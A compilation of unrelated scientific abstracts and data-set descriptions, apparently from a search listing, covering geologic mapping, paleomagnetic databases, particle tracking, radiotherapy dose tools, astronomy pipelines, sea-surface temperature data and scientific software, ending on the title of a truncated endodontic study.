This data set maps and describes the geology of the Big Bear City 7.5' quadrangle, San Bernardino County, California. Created using Environmental Systems Research Institute's ARC/INFO software, the data base consists of the following items: (1) a rock-unit coverage and attribute tables (polygon and arc) containing geologic contacts, units and rock-unit labels as annotation which are also included in a separate annotation coverage, bbc_anno (2) a point coverage containing structural point data and (3) a coverage containing fold axes. In addition, the data set includes the following graphic and text products: (1) A PostScript graphic plot-file containing the geologic map, topography, cultural data, a Correlation of Map Units (CMU) diagram, a Description of Map Units (DMU), an index map, a regional geologic and structure map, and an explanation for point and line symbols; (2) PDF files of the Readme (including the metadata file as an appendix), and a screen graphic of the plot produced by the PostScript plot file. The geologic map describes a geologically complex area on the north side of the San Bernardino Mountains. Bedrock units in the Big Bear City quadrangle are dominated by (1) large Cretaceous granitic bodies ranging in composition from monzogranite to gabbro, (2) metamorphosed sedimentary rocks ranging in age from late Paleozoic to late Proterozoic, and (3) Middle Proterozoic gneiss. These rocks are complexly deformed by normal, reverse, and thrust faults, and in places are tightly folded. The geologic map database contains original U.S. Geological Survey data generated by detailed field observation and by interpretation of aerial photographs. The map data was compiled on base-stable cronoflex copies of the Big Bear City 7.5' topographic map, transferred to a scribe-guide and subsequently digitized. Lines, points, and polygons were edited at the USGS using standard ARC/INFO commands. Digitizing and editing artifacts significant enough to display at a scale of 1:24,000 were corrected. Within the database, geologic contacts are represented as lines (arcs), geologic units as polygons, and site-specific data as points. Polygon, arc, and point attribute tables (.pat, .aat, and .pat, respectively) uniquely identify each geologic datum.
NASA Astrophysics Data System (ADS)
Jarboe, N.; Minnett, R.; Koppers, A.; Constable, C.; Tauxe, L.; Jonestrask, L.
2017-12-01
The Magnetics Information Consortium (MagIC) supports an online database for the paleo, geo, and rock magnetic communities ( https://earthref.org/MagIC ). Researchers can upload data into the archive and download data as selected with a sophisticated search system. MagIC has completed the transition from an Oracle backed, Perl based, server oriented website to an ElasticSearch backed, Meteor based thick client website technology stack. Using JavaScript on both the sever and the client enables increased code reuse and allows easy offloading many computational operations to the client for faster response. On-the-fly data validation, column header suggestion, and spreadsheet online editing are some new features available with the new system. The 3.0 data model, method codes, and vocabulary lists can be browsed via the MagIC website and more easily updated. Source code for MagIC is publicly available on GitHub ( https://github.com/earthref/MagIC ). The MagIC file format is natively compatible with the PmagPy ( https://github.com/PmagPy/PmagPy) paleomagnetic analysis software. MagIC files can now be downloaded from the database and viewed and interpreted in the PmagPy GUI based tool, pmag_gui. Changes or interpretations of the data can then be saved by pmag_gui in the MagIC 3.0 data format and easily uploaded to the MagIC database. The rate of new contributions to the database has been increasing with many labs contributing measurement level data for the first time in the last year. Over a dozen file format conversion scripts are available for translating non-MagIC measurement data files into the MagIC format for easy uploading. We will continue to work with more labs until the whole community has a manageable workflow for contributing their measurement level data. MagIC will continue to provide a global repository for archiving and retrieving paleomagnetic and rock magnetic data and, with the new system in place, be able to more quickly respond to the community's requests for changes and improvements.
NASA Astrophysics Data System (ADS)
Umansky, Moti; Weihs, Daphne
2012-08-01
In many physical and biophysical studies, single-particle tracking is utilized to reveal interactions, diffusion coefficients, active modes of driving motion, dynamic local structure, micromechanics, and microrheology. The basic analysis applied to those data is to determine the time-dependent mean-square displacement (MSD) of particle trajectories and perform time- and ensemble-averaging of similar motions. The motion of particles typically exhibits time-dependent power-law scaling, and only trajectories with qualitatively and quantitatively comparable MSD should be ensembled. Ensemble averaging trajectories that arise from different mechanisms, e.g., actively driven and diffusive, is incorrect and can result inaccurate correlations between structure, mechanics, and activity. We have developed an algorithm to automatically and accurately determine power-law scaling of experimentally measured single-particle MSD. Trajectories can then categorized and grouped according to user defined cutoffs of time, amplitudes, scaling exponent values, or combinations. Power-law fits are then provided for each trajectory alongside categorized groups of trajectories, histograms of power laws, and the ensemble-averaged MSD of each group. The codes are designed to be easily incorporated into existing user codes. We expect that this algorithm and program will be invaluable to anyone performing single-particle tracking, be it in physical or biophysical systems. Catalogue identifier: AEMD_v1_0 Program summary URL:http://cpc.cs.qub.ac.uk/summaries/AEMD_v1_0.html Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland Licensing provisions: Standard CPC licence, http://cpc.cs.qub.ac.uk/licence/licence.html No. of lines in distributed program, including test data, etc.: 25 892 No. of bytes in distributed program, including test data, etc.: 5 572 780 Distribution format: tar.gz Programming language: MATLAB (MathWorks Inc.) version 7.11 (2010b) or higher, program should also be backwards compatible. Symbolic Math Toolboxes (5.5) is required. The Curve Fitting Toolbox (3.0) is recommended. Computer: Tested on Windows only, yet should work on any computer running MATLAB. In Windows 7, should be used as administrator, if the user is not the administrator the program may not be able to save outputs and temporary outputs to all locations. Operating system: Any supporting MATLAB (MathWorks Inc.) v7.11 / 2010b or higher. Supplementary material: Sample output files (approx. 30 MBytes) are available. Classification: 12 External routines: Several MATLAB subfunctions (m-files), freely available on the web, were used as part of and included in, this code: count, NaN suite, parseArgs, roundsd, subaxis, wcov, wmean, and the executable pdfTK.exe. Nature of problem: In many physical and biophysical areas employing single-particle tracking, having the time-dependent power-laws governing the time-averaged meansquare displacement (MSD) of a single particle is crucial. Those power laws determine the mode-of-motion and hint at the underlying mechanisms driving motion. Accurate determination of the power laws that describe each trajectory will allow categorization into groups for further analysis of single trajectories or ensemble analysis, e.g. ensemble and time-averaged MSD. Solution method: The algorithm in the provided program automatically analyzes and fits time-dependent power laws to single particle trajectories, then group particles according to user defined cutoffs. It accepts time-dependent trajectories of several particles, each trajectory is run through the program, its time-averaged MSD is calculated, and power laws are determined in regions where the MSD is linear on a log-log scale. Our algorithm searches for high-curvature points in experimental data, here time-dependent MSD. Those serve as anchor points for determining the ranges of the power-law fits. Power-law scaling is then accurately determined and error estimations of the parameters and quality of fit are provided. After all single trajectory time-averaged MSDs are fit, we obtain cutoffs from the user to categorize and segment the power laws into groups; cutoff are either in exponents of the power laws, time of appearance of the fits, or both together. The trajectories are sorted according to the cutoffs and the time- and ensemble-averaged MSD of each group is provided, with histograms of the distributions of the exponents in each group. The program then allows the user to generate new trajectory files with trajectories segmented according to the determined groups, for any further required analysis. Additional comments: README file giving the names and a brief description of all the files that make-up the package and clear instructions on the installation and execution of the program is included in the distribution package. Running time: On an i5 Windows 7 machine with 4 GB RAM the automated parts of the run (excluding data loading and user input) take less than 45 minutes to analyze and save all stages for an 844 trajectory file, including optional PDF save. Trajectory length did not affect run time (tested up to 3600 frames/trajectory), which was on average 3.2±0.4 seconds per trajectory.
TU-AB-BRC-12: Optimized Parallel MonteCarlo Dose Calculations for Secondary MU Checks
DOE Office of Scientific and Technical Information (OSTI.GOV)
French, S; Nazareth, D; Bellor, M
Purpose: Secondary MU checks are an important tool used during a physics review of a treatment plan. Commercial software packages offer varying degrees of theoretical dose calculation accuracy, depending on the modality involved. Dose calculations of VMAT plans are especially prone to error due to the large approximations involved. Monte Carlo (MC) methods are not commonly used due to their long run times. We investigated two methods to increase the computational efficiency of MC dose simulations with the BEAMnrc code. Distributed computing resources, along with optimized code compilation, will allow for accurate and efficient VMAT dose calculations. Methods: The BEAMnrcmore » package was installed on a high performance computing cluster accessible to our clinic. MATLAB and PYTHON scripts were developed to convert a clinical VMAT DICOM plan into BEAMnrc input files. The BEAMnrc installation was optimized by running the VMAT simulations through profiling tools which indicated the behavior of the constituent routines in the code, e.g. the bremsstrahlung splitting routine, and the specified random number generator. This information aided in determining the most efficient compiling parallel configuration for the specific CPU’s available on our cluster, resulting in the fastest VMAT simulation times. Our method was evaluated with calculations involving 10{sup 8} – 10{sup 9} particle histories which are sufficient to verify patient dose using VMAT. Results: Parallelization allowed the calculation of patient dose on the order of 10 – 15 hours with 100 parallel jobs. Due to the compiler optimization process, further speed increases of 23% were achieved when compared with the open-source compiler BEAMnrc packages. Conclusion: Analysis of the BEAMnrc code allowed us to optimize the compiler configuration for VMAT dose calculations. In future work, the optimized MC code, in conjunction with the parallel processing capabilities of BEAMnrc, will be applied to provide accurate and efficient secondary MU checks.« less
DOE Office of Scientific and Technical Information (OSTI.GOV)
Pyakuryal, A; Moroz, B; Lee, C
2016-06-15
Purpose: Epidemiological studies of second cancer risk in radiotherapy patients often require individualized dose estimates of normal tissues. Prior to 3D conformal radiation therapy planning, patient anatomy information was mostly limited to 2D radiological images or not even available. Generic patient CT images are often used in commercial radiotherapy treatment planning system (TPS) to reconstruct normal tissue doses. The objective of the current work was to develop a series of reference size computational human phantoms in DICOM-RT format for direct use in dose reconstruction in TPS. Methods: Contours of 93 organs and tissues were extracted from a series of pediatricmore » and adult hybrid computational human phantoms (newborn, 1-, 5-, 10-, 15-year-old, and adult males and females) using Rhinoceros software. A MATLAB script was created to convert the contours into the DICOM-RT structure format. The simulated CT images with the resolution of 1×1×3 mm3 were also generated from the binary phantom format and coupled with the DICOM-structure files. Accurate volumes of the organs were drawn in the format using precise delineation of the contours in converted format. Due to complex geometry of organs, higher resolution (1×1×1 mm3) was found to be more efficient in the conversion of newborn and 1-year-old phantoms. Results: Contour sets were efficiently converted into DICOM-RT structures in relatively short time (about 30 minutes for each phantom). A good agreement was observed in the volumes between the original phantoms and the converted contours for large organs (NRMSD<1.0%) and small organs (NRMSD<7.7%). Conclusion: A comprehensive series of computational human phantoms in DICOM-RT format was created to support epidemiological studies of second cancer risks in radiotherapy patients. We confirmed the DICOM-RT phantoms were successfully imported into the TPS programs of major vendors.« less
VizieR Online Data Catalog: X-Ray source properties for NGC 2207/IC 2163 (Mineo+, 2014)
NASA Astrophysics Data System (ADS)
Mineo, S.; Rappaport, S.; Levine, A.; Pooley, D.; Steinhorn, B.; Homan, J.
2017-08-01
We analyzed four Chandra ACIS-S observations of the galaxy pair NGC 2207/IC 2163. The data reduction was done following the standard CIAO threads (CIAO version 4.6, CALDB version 4.5.9) for soft (0.5-2 keV), hard (2-8 keV), and broad (0.5-8.0 keV) energy bands. All Chandra data sets were reprocessed using chandra_repro, a script that automates the recommended data-processing steps presented in the CIAO analysis threads. Using the script fluximage, we computed a monochromatic exposure map for the mean photon energy of each band: 1.25 keV, 5.0 keV, and 4.25 keV for the soft, hard, and broad band, respectively. fluximage outputs both the instrument map for the center of each energy band using the tool mkinstmap and the exposure maps in sky coordinates for each energy band using mkexpmap. (5 data files).
IMCAT: Image and Catalogue Manipulation Software
NASA Astrophysics Data System (ADS)
Kaiser, Nick
2011-08-01
The IMCAT software was developed initially to do faint galaxy photometry for weak lensing studies, and provides a fairly complete set of tools for this kind of work. Unlike most packages for doing data analysis, the tools are standalone unix commands which you can invoke from the shell, via shell scripts or from perl scripts. The tools are arranges in a tree of directories. One main branch is the ’imtools’. These deal only with fits files. The most important imtool is the ’image calculator’ ’ic’ which allows one to do rather general operations on fits images. A second branch is the ’catools’ which operate only on catalogues. The key cattool is ’lc’; this effectively defines the format of IMCAT catalogues, and allows one to do very general operations on and filtering of such catalogues. A third branch is the ’imcattools’. These tend to be much more specialised than the cattools and imcattools and are focussed on faint galaxy photometry.
NASA Astrophysics Data System (ADS)
Reddy, K. Rasool; Rao, Ch. Madhava
2018-04-01
Currently safety is one of the primary concerns in the transmission of images due to increasing the use of images within the industrial applications. So it's necessary to secure the image facts from unauthorized individuals. There are various strategies are investigated to secure the facts. In that encryption is certainly one of maximum distinguished method. This paper gives a sophisticated Rijndael (AES) algorithm to shield the facts from unauthorized humans. Here Exponential Key Change (EKE) concept is also introduced to exchange the key between client and server. The things are exchange in a network among client and server through a simple protocol is known as Trivial File Transfer Protocol (TFTP). This protocol is used mainly in embedded servers to transfer the data and also provide protection to the data if protection capabilities are integrated. In this paper, implementing a GUI environment for image encryption and decryption. All these experiments carried out on Linux environment the usage of Open CV-Python script.
Data Processing Factory for the Sloan Digital Sky Survey
NASA Astrophysics Data System (ADS)
Stoughton, Christopher; Adelman, Jennifer; Annis, James T.; Hendry, John; Inkmann, John; Jester, Sebastian; Kent, Steven M.; Kuropatkin, Nickolai; Lee, Brian; Lin, Huan; Peoples, John, Jr.; Sparks, Robert; Tucker, Douglas; Vanden Berk, Dan; Yanny, Brian; Yocum, Dan
2002-12-01
The Sloan Digital Sky Survey (SDSS) data handling presents two challenges: large data volume and timely production of spectroscopic plates from imaging data. A data processing factory, using technologies both old and new, handles this flow. Distribution to end users is via disk farms, to serve corrected images and calibrated spectra, and a database, to efficiently process catalog queries. For distribution of modest amounts of data from Apache Point Observatory to Fermilab, scripts use rsync to update files, while larger data transfers are accomplished by shipping magnetic tapes commercially. All data processing pipelines are wrapped in scripts to address consecutive phases: preparation, submission, checking, and quality control. We constructed the factory by chaining these pipelines together while using an operational database to hold processed imaging catalogs. The science database catalogs all imaging and spectroscopic object, with pointers to the various external files associated with them. Diverse computing systems address particular processing phases. UNIX computers handle tape reading and writing, as well as calibration steps that require access to a large amount of data with relatively modest computational demands. Commodity CPUs process steps that require access to a limited amount of data with more demanding computations requirements. Disk servers optimized for cost per Gbyte serve terabytes of processed data, while servers optimized for disk read speed run SQLServer software to process queries on the catalogs. This factory produced data for the SDSS Early Data Release in June 2001, and it is currently producing Data Release One, scheduled for January 2003.
Moderate-resolution sea surface temperature data for the nearshore North Pacific
Payne, Meredith C.; Reusser, Deborah A.; Lee, Henry; Brown, Cheryl A.
2011-01-01
Coastal sea surface temperature (SST) is an important environmental characteristic in determining the suitability of habitat for nearshore marine and estuarine organisms. This publication describes and provides access to an easy-to-use coastal SST dataset for ecologists, biogeographers, oceanographers, and other scientists conducting research on nearshore marine habitats or processes. The data cover the Temperate Northern Pacific Ocean as defined by the 'Marine Ecosystems of the World' (MEOW) biogeographic schema developed by The Nature Conservancy. The spatial resolution of the SST data is 4-km grid cells within 20 km of the shore. The data span a 29-year period - from September 1981 to December 2009. These SST data were derived from Advanced Very High Resolution Radiometer (AVHRR) instrument measurements compiled into monthly means as part of the Pathfinder versions 5.0 and 5.1 (PFSST V50 and V51) Project. The processing methods used to transform the data from their native Hierarchical Data Format Scientific Data Set (HDF SDS) to georeferenced, spatial datasets capable of being read into geographic information systems (GIS) software are explained. In addition, links are provided to examples of scripts involved in the data processing steps. The scripts were written in the Python programming language, which is supported by ESRI's ArcGIS version 9 or later. The processed data files are also provided in text (.csv) and Access 2003 Database (.mdb) formats. All data except the raster files include attributes identifying realm, province, and ecoregion as defined by the MEOW classification schema.
SEQassembly: A Practical Tools Program for Coding Sequences Splicing
NASA Astrophysics Data System (ADS)
Lee, Hongbin; Yang, Hang; Fu, Lei; Qin, Long; Li, Huili; He, Feng; Wang, Bo; Wu, Xiaoming
CDS (Coding Sequences) is a portion of mRNA sequences, which are composed by a number of exon sequence segments. The construction of CDS sequence is important for profound genetic analysis such as genotyping. A program in MATLAB environment is presented, which can process batch of samples sequences into code segments under the guide of reference exon models, and splice these code segments of same sample source into CDS according to the exon order in queue file. This program is useful in transcriptional polymorphism detection and gene function study.
Automation Framework for Flight Dynamics Products Generation
NASA Technical Reports Server (NTRS)
Wiegand, Robert E.; Esposito, Timothy C.; Watson, John S.; Jun, Linda; Shoan, Wendy; Matusow, Carla
2010-01-01
XFDS provides an easily adaptable automation platform. To date it has been used to support flight dynamics operations. It coordinates the execution of other applications such as Satellite TookKit, FreeFlyer, MATLAB, and Perl code. It provides a mechanism for passing messages among a collection of XFDS processes, and allows sending and receiving of GMSEC messages. A unified and consistent graphical user interface (GUI) is used for the various tools. Its automation configuration is stored in text files, and can be edited either directly or using the GUI.
A Phase-Based Approach to Satellite Constellation Analysis and Design
1991-01-01
and 4p is a phase angle representing true anomaly, as measured from the line of nodes. For a spherical earth, the orbital parameters are related...Var Outdat : Arrayll..2,1..90] of Real; J Output data for cost versus optimization parameter I F : text; { Output file Y, DY : Vec2; Y is a point on...InitGraph(Gd, Gm,’graph’); Assign(f,’c:\\matlab\\ OutDat ’); Rewrite (f); 129 7 o / With Common do with Target do With LoopParm do With Constellation do
Stanzel, Sven; Weimer, Marc; Kopp-Schneider, Annette
2013-06-01
High-throughput screening approaches are carried out for the toxicity assessment of a large number of chemical compounds. In such large-scale in vitro toxicity studies several hundred or thousand concentration-response experiments are conducted. The automated evaluation of concentration-response data using statistical analysis scripts saves time and yields more consistent results in comparison to data analysis performed by the use of menu-driven statistical software. Automated statistical analysis requires that concentration-response data are available in a standardised data format across all compounds. To obtain consistent data formats, a standardised data management workflow must be established, including guidelines for data storage, data handling and data extraction. In this paper two procedures for data management within large-scale toxicological projects are proposed. Both procedures are based on Microsoft Excel files as the researcher's primary data format and use a computer programme to automate the handling of data files. The first procedure assumes that data collection has not yet started whereas the second procedure can be used when data files already exist. Successful implementation of the two approaches into the European project ACuteTox is illustrated. Copyright © 2012 Elsevier Ltd. All rights reserved.
HeFPipe: a complete analytical pipeline for heterozygosity-fitness correlation studies.
Fisher, Mark A
2014-01-01
As the body of heterozygosity-fitness correlation (HFC) research grows, more and increasingly complicated tests have become an integral part of a typical HFC analysis (Chapman et al. 2009). Currently, no software is available to undertake conversion between the file formats required to conduct all of these tests and to conduct the main regression analyses at the core of all HFCs. Heterozygosity-Fitness Pipeline (HeFPipe) is a script written in Python that accomplishes both of these tasks for studies based on microsatellite data. HeFPipe is designed to be used from the command line terminal and will run on any Mac OSX computer. The script takes input in the form of allele reports from either the genotype-calling software, GeneMapper or GeneMarker, and reconfigures the data into GENEPOP (Raymond & Rousset 1995), Rhh (Alho et al. 2010), RMES (David et al. 2007) and GEPHAST (Amos & Acevedo-Whitehouse 2009) formats. The script is also equipped to reformat the output from GENEPOP on the Web (option 5) and Rhh into csv spreadsheets that can be incorporated into downstream analyses. HeFPipe accommodates user-provided lists of samples and markers to be included in or excluded from analyses. HeFPipe is equipped to create generalized linear models (GLMs) from both the main data set and subsets of the data. Finally, HeFPipe allows users to explore single-marker effects and conduct correlation analyses. The script, a comprehensive manual, a link to a series of video tutorials, and an example data set are available from GitHub (http://github.com/Atticus29/HeFPipe_rpos). © 2013 John Wiley & Sons Ltd.
DOE Office of Scientific and Technical Information (OSTI.GOV)
2007-06-18
UEDGE is an interactive suite of physics packages using the Python or BASIS scripting systems. The plasma is described by time-dependent 2D plasma fluid equations that include equations for density, velocity, ion temperature, electron temperature, electrostatic potential, and gas density in the edge region of a magnetic fusion energy confinement device. Slab, cylindrical, and toroidal geometries are allowed, and closed and open magnetic field-line regions are included. Classical transport is assumed along magnetic field lines, and anomalous transport is assumed across field lines. Multi-charge state impurities can be included with the corresponding line-radiation energy loss. Although UEDGE is written inmore » Fortran, for efficient execution and analysis of results, it utilizes either Python or BASIS scripting shells. Python is easily available for many platforms (http://www.Python.org/). The features and availability of BASIS are described in "Basis Manual Set" by P.F. Dubois, Z.C. Motteler, et al., Lawrence Livermore National Laboratory report UCRL-MA-1 18541, June, 2002 and http://basis.llnl.gov. BASIS has been reviewed and released by LLNL for unlimited distribution. The Python version utilizes PYBASIS scripts developed by D.P. Grote, LLNL. The Python version also uses MPPL code and MAC Perl script, available from the public-domain BASIS source above. The Forthon version of UEDGE uses the same source files, but utilizes Forthon to produce a Python-compatible source. Forthon has been developed by D.P. Grote at LBL (see http://hifweb.lbl.gov/Forthon/ and Grote et al. in the references below), and it is freely available. The graphics can be performed by any package importable to Python, such as PYGIST.« less
DOE Office of Scientific and Technical Information (OSTI.GOV)
Powell, Thomas; Kueppers, Lara; Paton, Steve
This dataset is a derivative product of raw meteorological data collected at Barro Colorado Island, Panama (see acknowledgements below). This dataset contains the following: 1) a seven-year record (2008-2014) of meteorological observations from BCI that is in a comma delimited text format, 2) an R-script that converts the observed meteorology into an hdf5 format that can be read by the ED2 model, 3) two decades of meteorological drivers in hdf5 format that are based on the 7-year record of observations and include a synthetic 2-yr El Nino drought, 4) a ReadMe.txt file that explains how the data in the hdf5more » meteorological drivers correspond to the observations. The raw meteorological data were further QC'd as part of the NGEE-Tropics project to derive item 1 above. The R-script makes the appropriate unit conversions for all observed meteorological variables to be compatible with the ED2 model. The R-script also converts RH into specific humidity, splits total shortwave radiation into its 4-stream parts, and calculates longwave radiation from air temperature and RH. The synthetic El Nino drought is based on selected months from the observed meteorology where in each, precipitation (only) of the selected months was modified to reflect the precipitation patterns of the 1982/83 El Nino observed at BCI.« less
Parallel, Distributed Scripting with Python
DOE Office of Scientific and Technical Information (OSTI.GOV)
Miller, P J
2002-05-24
Parallel computers used to be, for the most part, one-of-a-kind systems which were extremely difficult to program portably. With SMP architectures, the advent of the POSIX thread API and OpenMP gave developers ways to portably exploit on-the-box shared memory parallelism. Since these architectures didn't scale cost-effectively, distributed memory clusters were developed. The associated MPI message passing libraries gave these systems a portable paradigm too. Having programmers effectively use this paradigm is a somewhat different question. Distributed data has to be explicitly transported via the messaging system in order for it to be useful. In high level languages, the MPI librarymore » gives access to data distribution routines in C, C++, and FORTRAN. But we need more than that. Many reasonable and common tasks are best done in (or as extensions to) scripting languages. Consider sysadm tools such as password crackers, file purgers, etc ... These are simple to write in a scripting language such as Python (an open source, portable, and freely available interpreter). But these tasks beg to be done in parallel. Consider the a password checker that checks an encrypted password against a 25,000 word dictionary. This can take around 10 seconds in Python (6 seconds in C). It is trivial to parallelize if you can distribute the information and co-ordinate the work.« less
FlaME: Flash Molecular Editor - a 2D structure input tool for the web.
Dallakian, Pavel; Haider, Norbert
2011-02-01
So far, there have been no Flash-based web tools available for chemical structure input. The authors herein present a feasibility study, aiming at the development of a compact and easy-to-use 2D structure editor, using Adobe's Flash technology and its programming language, ActionScript. As a reference model application from the Java world, we selected the Java Molecular Editor (JME). In this feasibility study, we made an attempt to realize a subset of JME's functionality in the Flash Molecular Editor (FlaME) utility. These basic capabilities are: structure input, editing and depiction of single molecules, data import and export in molfile format. The result of molecular diagram sketching in FlaME is accessible in V2000 molfile format. By integrating the molecular editor into a web page, its communication with the HTML elements on this page is established using the two JavaScript functions, getMol() and setMol(). In addition, structures can be copied to the system clipboard. A first attempt was made to create a compact single-file application for 2D molecular structure input/editing on the web, based on Flash technology. With the application examples presented in this article, it could be demonstrated that the Flash methods are principally well-suited to provide the requisite communication between the Flash object (application) and the HTML elements on a web page, using JavaScript functions.
Harrison, Arnell S.; Dadisman, Shawn V.; Kindinger, Jack G.; Morton, Robert A.; Blum, Mike D.; Wiese, Dana S.; Subiño, Janice A.
2007-01-01
In June of 1996, the U.S. Geological Survey conducted geophysical surveys from Nueces to Copano Bays, Texas. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS information, cruise log, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles and high resolution scanned TIFF images of the original paper printouts are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Harrison, Arnell S.; Dadisman, Shawn V.; Davis, Jeffrey B.; Flocks, James G.; Wiese, Dana S.
2009-01-01
From September 2 through 4, 2008, the U.S. Geological Survey and St. Johns River Water Management District (SJRWMD) conducted geophysical surveys in Lakes Cherry, Helen, Hiawassee, Louisa, and Prevatt, central Florida. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS information, FACS logs, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Enhancing AFLOW Visualization using Jmol
NASA Astrophysics Data System (ADS)
Lanasa, Jacob; New, Elizabeth; Stefek, Patrik; Honaker, Brigette; Hanson, Robert; Aflow Collaboration
The AFLOW library is a database of theoretical solid-state structures and calculated properties created using high-throughput ab initio calculations. Jmol is a Java-based program capable of visualizing and analyzing complex molecular structures and energy landscapes. In collaboration with the AFLOW consortium, our goal is the enhancement of the AFLOWLIB database through the extension of Jmol's capabilities in the area of materials science. Modifications made to Jmol include the ability to read and visualize AFLOW binary alloy data files, the ability to extract from these files information using Jmol scripting macros that can be utilized in the creation of interactive web-based convex hull graphs, the capability to identify and classify local atomic environments by symmetry, and the ability to search one or more related crystal structures for atomic environments using a novel extension of inorganic polyhedron-based SMILES strings
Using MATLAB software with Tomcat server and Java platform for remote image analysis in pathology.
Markiewicz, Tomasz
2011-03-30
The Matlab software is a one of the most advanced development tool for application in engineering practice. From our point of view the most important is the image processing toolbox, offering many built-in functions, including mathematical morphology, and implementation of a many artificial neural networks as AI. It is very popular platform for creation of the specialized program for image analysis, also in pathology. Based on the latest version of Matlab Builder Java toolbox, it is possible to create the software, serving as a remote system for image analysis in pathology via internet communication. The internet platform can be realized based on Java Servlet Pages with Tomcat server as servlet container. In presented software implementation we propose remote image analysis realized by Matlab algorithms. These algorithms can be compiled to executable jar file with the help of Matlab Builder Java toolbox. The Matlab function must be declared with the set of input data, output structure with numerical results and Matlab web figure. Any function prepared in that manner can be used as a Java function in Java Servlet Pages (JSP). The graphical user interface providing the input data and displaying the results (also in graphical form) must be implemented in JSP. Additionally the data storage to database can be implemented within algorithm written in Matlab with the help of Matlab Database Toolbox directly with the image processing. The complete JSP page can be run by Tomcat server. The proposed tool for remote image analysis was tested on the Computerized Analysis of Medical Images (CAMI) software developed by author. The user provides image and case information (diagnosis, staining, image parameter etc.). When analysis is initialized, input data with image are sent to servlet on Tomcat. When analysis is done, client obtains the graphical results as an image with marked recognized cells and also the quantitative output. Additionally, the results are stored in a server database. The internet platform was tested on PC Intel Core2 Duo T9600 2.8 GHz 4 GB RAM server with 768x576 pixel size, 1.28 Mb tiff format images reffering to meningioma tumour (x400, Ki-67/MIB-1). The time consumption was as following: at analysis by CAMI, locally on a server - 3.5 seconds, at remote analysis - 26 seconds, from which 22 seconds were used for data transfer via internet connection. At jpg format image (102 Kb) the consumption time was reduced to 14 seconds. The results have confirmed that designed remote platform can be useful for pathology image analysis. The time consumption is depended mainly on the image size and speed of the internet connections. The presented implementation can be used for many types of analysis at different staining, tissue, morphometry approaches, etc. The significant problem is the implementation of the JSP page in the multithread form, that can be used parallelly by many users. The presented platform for image analysis in pathology can be especially useful for small laboratory without its own image analysis system.
Using MATLAB software with Tomcat server and Java platform for remote image analysis in pathology
2011-01-01
Background The Matlab software is a one of the most advanced development tool for application in engineering practice. From our point of view the most important is the image processing toolbox, offering many built-in functions, including mathematical morphology, and implementation of a many artificial neural networks as AI. It is very popular platform for creation of the specialized program for image analysis, also in pathology. Based on the latest version of Matlab Builder Java toolbox, it is possible to create the software, serving as a remote system for image analysis in pathology via internet communication. The internet platform can be realized based on Java Servlet Pages with Tomcat server as servlet container. Methods In presented software implementation we propose remote image analysis realized by Matlab algorithms. These algorithms can be compiled to executable jar file with the help of Matlab Builder Java toolbox. The Matlab function must be declared with the set of input data, output structure with numerical results and Matlab web figure. Any function prepared in that manner can be used as a Java function in Java Servlet Pages (JSP). The graphical user interface providing the input data and displaying the results (also in graphical form) must be implemented in JSP. Additionally the data storage to database can be implemented within algorithm written in Matlab with the help of Matlab Database Toolbox directly with the image processing. The complete JSP page can be run by Tomcat server. Results The proposed tool for remote image analysis was tested on the Computerized Analysis of Medical Images (CAMI) software developed by author. The user provides image and case information (diagnosis, staining, image parameter etc.). When analysis is initialized, input data with image are sent to servlet on Tomcat. When analysis is done, client obtains the graphical results as an image with marked recognized cells and also the quantitative output. Additionally, the results are stored in a server database. The internet platform was tested on PC Intel Core2 Duo T9600 2.8GHz 4GB RAM server with 768x576 pixel size, 1.28Mb tiff format images reffering to meningioma tumour (x400, Ki-67/MIB-1). The time consumption was as following: at analysis by CAMI, locally on a server – 3.5 seconds, at remote analysis – 26 seconds, from which 22 seconds were used for data transfer via internet connection. At jpg format image (102 Kb) the consumption time was reduced to 14 seconds. Conclusions The results have confirmed that designed remote platform can be useful for pathology image analysis. The time consumption is depended mainly on the image size and speed of the internet connections. The presented implementation can be used for many types of analysis at different staining, tissue, morphometry approaches, etc. The significant problem is the implementation of the JSP page in the multithread form, that can be used parallelly by many users. The presented platform for image analysis in pathology can be especially useful for small laboratory without its own image analysis system. PMID:21489188
Poster - Thur Eve - 54: A software solution for ongoing DVH quality assurance in radiation therapy.
Annis, S-L; Zeng, G; Wu, X; Macpherson, M
2012-07-01
A program has been developed in MATLAB for use in quality assurance of treatment planning of radiation therapy. It analyzes patient DVH files and compiles dose volume data for review, trending, comparison and analysis. Patient DVH files are exported from the Eclipse treatment planning system and saved according to treatment sites and date. Currently analysis is available for 4 treatment sites; Prostate, Prostate Bed, Lung, and Upper GI, with two functions for data report and analysis: patient-specific and organ-specific. The patient-specific function loads one patient DVH file and reports the user-specified dose volume data of organs and targets. These data can be compiled to an external file for a third party analysis. The organ-specific function extracts a requested dose volume of an organ from the DVH files of a patient group and reports the statistics over this population. A graphical user interface is utilized to select clinical sites, function and structures, and input user's requests. We have implemented this program in planning quality assurance at our center. The program has tracked the dosimetric improvement in GU sites after VMAT was implemented clinically. It has generated dose volume statistics for different groups of patients associated with technique or time range. This program allows reporting and statistical analysis of DVH files. It is an efficient tool for the planning quality control in radiation therapy. © 2012 American Association of Physicists in Medicine.
Canal shaping with WaveOne Primary reciprocating files and ProTaper system: a comparative study.
Berutti, Elio; Chiandussi, Giorgio; Paolino, Davide Salvatore; Scotti, Nicola; Cantatore, Giuseppe; Castellucci, Arnaldo; Pasqualini, Damiano
2012-04-01
